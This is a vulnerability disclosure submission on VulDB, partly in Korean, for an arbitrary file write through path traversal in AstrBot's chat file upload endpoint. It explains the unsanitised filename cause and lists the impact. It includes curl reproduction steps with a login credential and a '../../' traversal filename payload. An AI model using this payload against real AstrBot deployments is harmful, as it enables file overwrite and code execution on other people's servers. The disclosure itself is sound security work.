제출 #811172: AstrBotDevs AstrBot latest Path Traversal (CWE-22)정보

제목	AstrBotDevs AstrBot latest Path Traversal (CWE-22)
설명	# Technical Details An Arbitrary File Write vulnerability exists in the `post_file()` method in `astrbot/dashboard/routes/chat.py` (lines 149–163) of AstrBot. The application fails to sanitize the `filename` field from multipart/form-data uploads before passing it to `os.path.join(attachments_dir, filename)` and `await file.save(path)`, allowing path traversal sequences (e.g., `../../../../tmp/evil.txt`) to escape the intended attachments directory. # Vulnerable Code File: astrbot/dashboard/routes/chat.py (L149–163) Method: post_file() Why: The filename from the multipart upload is used directly in os.path.join() without applying os.path.basename() or werkzeug.utils.secure_filename(), allowing directory traversal to write files anywhere the process has access. # Reproduction 1. Authenticate to obtain a JWT token: curl -X POST http://127.0.0.1:6185/api/auth/login -H "Content-Type: application/json" -d '{"username":"astrbot","password":"77b90590a8945a7d36c963981a307dc9"}' 2. Upload a file with a traversal filename: curl -X POST http://127.0.0.1:6185/api/chat/post_file -H "Authorization: Bearer <TOKEN>" -F "[email protected];filename=../../../../../../../../tmp/pwned.txt" 3. Verify the file was written outside the intended directory: docker exec astrbot_container cat /tmp/pwned.txt # Impact - Arbitrary File Write to any path writable by the server process - Remote Code Execution via overwriting application scripts (.py files) or cron jobs - Denial of Service via overwriting critical system configuration files - Data Exfiltration enablement through cron/service configuration poisoning
원천	⚠️ https://gist.github.com/YLChen-007/054415c2b63e58813328bc879a90c504
사용자	Eric-a (UID 96353)
제출	2026. 04. 23. AM 09:31 (1 월 ago)
모더레이션	2026. 05. 16. PM 07:34 (23 days later)
상태	수락
VulDB 항목	364381 [AstrBotDevs AstrBot 까지 4.23.5 File Upload chat.py post_file filename 디렉토리 순회]
포인트들	20

◂ 이전 개요 다음 ▸

Do you know our Splunk app?

Download it now for free!